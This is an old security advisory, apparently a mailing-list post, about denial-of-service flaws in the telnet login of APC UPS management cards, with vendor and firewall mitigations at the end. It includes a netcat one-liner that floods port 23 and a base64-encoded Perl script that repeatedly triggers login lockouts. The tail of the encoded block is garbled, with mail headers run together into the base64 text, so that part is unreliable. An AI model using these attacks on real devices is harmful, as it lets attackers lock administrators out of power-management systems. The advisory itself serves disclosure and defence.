COMMAND

    APC

SYSTEMS AFFECTED

    APC web/snmp/telnet management

PROBLEM

    'altomo' found following.  Some  APC products such as the  symetra
    offer the  option of  adding a  management card  to allow an admin
    the ablilty  to setup  monitoring and  notification.   The card is
    accessable by snmp, web interface, and telnet.  Itseems that  only
    one  telnet  connection  is  allowed  at  a time.(problem 1).  The
    telnet sesssion  is authenticated  by a  user/password method,  if
    the incorrect combination  is entered 3  times no connections  are
    allowed  for  the  defined  lockout  time.  Min.  1 minute, max 10
    minutes.  (problem 2)

    Problem 1
    =========
    Since only one connection is  allowed to the telnet port  an admin
    could be kept from connecting.  Easy to reproduce.

        cat /dev/zero | nc ip-here 23  (ya ya dirty)

    Problem 2
    =========
    Lock out period.  Lock out periods are a good thing, we really  do
    like them.  But  when no one can  connect its a bad  thing.  Since
    the lockout  period can  not be  set to  0 an  attacker could take
    advantage of  this by  sending 3  incorrect login  attempts to the
    unit and  repeat every  60 secs  using the  minimal lockout  time.
    Even if  the admin  has lockout  set to  10 minutes  it will  keep
    repeating and work when it actually is enabled again.

    Both of these are easy to reproduce.

    DoS Code:

    ---
    Content-Type: application/octet-stream; name="apcdos.pl"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="apcdos.pl"
    Content-MD5: F3KB1oBnhiW8zWzz9gvdVQ==
    
    IyEvdXNyL2Jpbi9wZXJsCiNhbHRvbW9AbnVkZWhhY2tlcnMuY29tCiNhcGMgbWFuYWdlbWVu
    dCBjYXJkIGRvcwoKJHVzZXIgPSAiYmxhY2tzdW4iOwokdGltZSA9ICIkQVJHVlsxXSI7Cgp1
    c2UgSU86OlNvY2tldDsKJGlwID0gIiRBUkdWWzBdIjsKJHBvcnQgPSAiMjMiOwppZiAoJCNB
    UkdWPDApIHsKcHJpbnQgIiB1c2VhZ2U6ICQwIDxob3N0bmFtZT4gPGRlbGF5IGluIHNlY29u
    ZHM+XG4iOwpleGl0KCk7Cn0KJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldygKUHJv
    dG89PiJ0Y3AiLApQZWVyQWRkcj0+JGlwLApQZWVyUG9ydD0+JHBvcnQsKTsKCgpwcmludCAi
    QXBjIG1hbmFnZW1lbnQgY2FyZCBEb1NcbiI7CnByaW50ICJhbHRvbW9cQG51ZGVoYWNrZXJz
    LmNvbVxuIjsKCgpzdWIgZG9zKCkgewpwcmludCAiRG9TIHN0YXJ0ZWQgd2lsbCBhdHRhY2sg
    ZXZlcnkgJHRpbWUgc2Vjb25kc1xuIjsKcHJpbnQgIkN0cmwrQyB0byBleGl0XG4iOwpwcmlu
    dCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tldCAiJHVzZXJcciI7CnByaW50ICRz
    b2NrZXQgIiR1c2VyXHIiOwpwcmludCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tl
    dCAiJHVzZXJcciI7CnByaW50ICRzb2NrZXQgIiR1c2VyXHIiOwpwcmludCAiXG4iOwpjbG9z
    ZSAkc29ja2V0OwpzbGVlcCgkdGltZSk7ICAgICAgICAgIAomZG9zOwoKfQomZG9zOwojaG9u
    ZyBrb25nIGRhbmdlciBkdW8KFromownerbugtraqSECURITYFOCUSCOMTueFeb2720540720
    01Receivedfromlistssecurityfocuscomlistssecurityfocuscom66381517byoliver
    efrihr893/893withESMTPidUAA10199forcrvEFRIHRTue27Feb2001205405+0100METRe
    ceivedfromlistssecurityfocuscomlistssecurityfocuscom66381517bylistssecur
    ityfocuscomPostfixwithESMTPid56E6424D012Tue27Feb20011213430700MSTReceive
    dfromLISTSSECURITYFOCUSCOMbyLISTSSECURITYFOCUSCOMLISTSERVTCP/IPrelease18
    dwithspoolid27190053forBUGTRAQLISTSSECURITYFOCUSCOMTue27Feb2001121255070
    0ApprovedBybengSECURITYFOCUSCOMDeliveredTobugtraqlistssecurityfocuscomRe
    ceivedfromsecurityfocuscommailsecurityfocuscom66381519bylistssecurityfoc
    uscomPostfixwithSMTPidE76A524E12AforbugtraqlistssecurityfocuscomMon26Feb
    20011535370700MSTReceivedqmail21247invokedbyalias26Feb20012235530000Deli
    veredToBUGTRAQSECURITYFOCUSCOMReceivedqmail21240invokedfromnetwork26Feb2
    0012235530000Receivedfrom2464145133onwavehomecomHELOKWANca2464145133byma
    ilsecurityfocuscomwithSMTP26Feb20012235530000Receivedfromlocalhostdkwanl
    ocalhostbyKWANca8111/893withESMTPidf1QMbJQ15118Mon26Feb20011737190500MIM
    EVersion10ContentTypeTEXT/PLAINcharseg==
    
    -----

SOLUTION

    Author contacted APC via email and informed they of what had  been
    found and asked if this was  going to be addressed in the  future.
    The response received back was:

        "At this time the security on  the web card is at its  highest
         level.  The only other  suggestion is to make changes  on the
         firewall."

    APC's responds  is kinda  true.   Why would  you want  to have the
    telnet port  to your  UPS open  wide up  to the  world.  These UPS
    IP's  should  sit  behind  your  DMZ  and treat them as a internal
    servers.  Or atleast they should be on a private subnet, and Admin
    have to logon to a box and hop over to the UPS private subnet.

    BUT what about internal attackers?  There are 2 ghetto style  work
    arounds of course.

        1. leave web or snmp open to managed this product
        2. put on a private network  and have a linux box infront  ssh
           to linux box then telnet to apc.